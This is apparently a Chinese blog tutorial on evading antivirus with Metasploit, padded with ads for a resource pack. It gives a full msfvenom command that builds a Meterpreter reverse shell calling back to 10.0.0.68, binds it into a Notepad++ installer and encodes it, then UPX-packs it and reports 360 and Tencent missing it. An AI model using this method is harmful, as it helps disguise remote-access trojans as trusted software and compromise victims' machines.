免责声明:由于传播、利用本人提供的文章、工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本人不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,本号会立即删除并致歉。谢谢!
免杀,全称为反杀毒技术(Anti Anti-Virus),是一种能使病毒或木马免于被杀毒软件查杀的技术。
免杀技术的定义与原理
定义: 免杀技术通过修改病毒、木马的内容或者特征码,使其能够躲避杀毒软件的查杀。
原理: 杀毒软件通常通过识别病毒或木马的特征码来检测和清楚恶意软件。免杀技术通过修改这些特征码,使病毒或木马在杀毒软件的检测下“隐身”。
我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程,需要的小伙伴可以扫描下方二维码或链接免费领取~
免杀的分类
免杀技术可以根据不同的标准进行分类,下面是两种常见的分类方式:
按是否有源代码分类
开源免杀: 指在病毒、木马源代码的前提下,通过修改源代码进行免杀。
手工免杀: 指在仅有病毒、木马的可执行文件(如.exe文件,即PE文件)的情况下进行免杀。
按免杀方式分类
文件免杀和查杀: 在不运行程序的前提下使用杀毒软件进行对该程序的扫描。
内存的免杀和查杀:通过运行程序后,使用杀毒软件的内存查杀功能或特定的工具(如OD)进行查杀。
MSF免杀的实验
裸奔木马
1、在Kali中直接使用Msfvenom生成木马文件,不做任何免杀处理,如下图:
image-20241022212108225
打开服务器
image-20241022212204807
传输到靶机
直接就被杀了
我们先信任该文件,保存到本地,用其他的木马分析平台看看
在线杀毒
腾讯哈勃分析系统
好家伙,未发现风险。。。。。
沙箱
国家计算机病毒协同分析平台
恶意是正常的,但我看到了如下结果,360没有检测出结果!!!
打开360,经过评测,这个平台不行 。。
上述测试结果仅为参考,VirusTotal拥有超过40种反病毒引擎,但仍不能保证扫描通过的文件绝对安全,因为威胁总在不断演进。事实上,无软件能确保100%检测病毒与恶意软件,杀毒软件旨在最大化用户保护。该平台支持邮件提交或直接上传文件进行分析,且每15分钟更新病毒库,以最新反病毒引擎检测多数潜在威胁。
MSF编码
在Meatsploit框架中,一种免杀方法是利用MSF编码器。该编码器能重新排列和编码攻击载荷文件,从而改变可执行代码的形态,以躲避杀毒软件的检测。具体来说,MSF编码器能将原始可执行程序转换为一个新的二进制文件。运行此新文件时,MSF编码器会在内存中解码并执行原始程序。
查看所有的编码格式
msfvenom -l encoder
Metasploit 自带了用于捆绑木马程序的程序模板,其位置在data/templates/template.exe ,虽然这个模板经常会更新,但是其仍是各大反病毒木马厂商的关注点。为了更好的实现免杀,此处自主选择一个待捆绑程序。
我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程,需要的小伙伴可以扫描下方二维码或链接免费领取~
3、使用以下命令生成 Windows环境下的木马、并捆绑到npp.7.8.5.installer.exe文件上,
下载地址:
https://notepad-plus-plus.org/downloads/v7.8.5/
同时对木马文件进行x86/shikata_ga_nai编码方式的免杀处理:
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.0.0.68 lport=4444 -e x86/shikata_ga_nai -x npp.7.8.5.Installer.exe -i 12 -f exe -o ./npp.exe
每项参数
| 参数 | 备注 |
|---|---|
| -e | 指定编码方式对攻击载荷进行重新编码 |
| -x | 指定木马捆绑在哪个可执行程序模版上 |
| -i | 指定对目标进行编码的次数,多次编码理论上来讲有助于免杀 |
| -f | 指定MSF编码器输出的程序的格式 |
| -o | 指定处理完毕后的文件输出路径 |
将木马文件传输给靶机
用到 multi/handler 模块配置如下
双击运行,这里是运行着腾讯电脑管家的。
成功上线
电脑管家
360免杀了。。。。。。我怀疑我装了个假的360。
沙箱
UPX加壳
UPX打包器原理简单:压缩可执行文件,附加解压缩代码。运行时先解压,再执行。其旨在反调试、防逆向。此用打包器,为改变后门特征码。
1、Kali 内置了 upx 工具,执行 upx 命令可查看简略的参数介绍:
2、执行以下命令,对刚才生成的木马文件进行加壳处理:
将加壳后的木马传到靶机,360检测,还是免杀。。。。垃圾360
执行这个exe程序,成功
总结
免杀与反免杀的较量永无止境。本文所述方法目前有效,但技术日新月异,免杀需不断实践与创新,方能在实战中立于不败之地。
网络安全学习资源分享:
给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,请看下方扫描即可前往获取
👉1.成长路线图&学习规划👈
要学习一门新的技术,作为新手一定要先学习成长路线图,方向不对,努力白费。
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
👉2.网安入门到进阶视频教程👈
很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩。(全套教程扫描领取哈)
👉3.SRC&黑客文档👈
大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录
SRC技术文籍:
黑客资料由于是敏感资源,这里不能直接展示哦! (全套教程扫描领取哈)
👉4.护网行动资料👈
其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!
👉5.黑客必读书单👈
👉6.网络安全岗面试题合集👈
当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。
所有资料共282G,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,可以扫描下方二维码或链接免费领取~
扫一扫
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
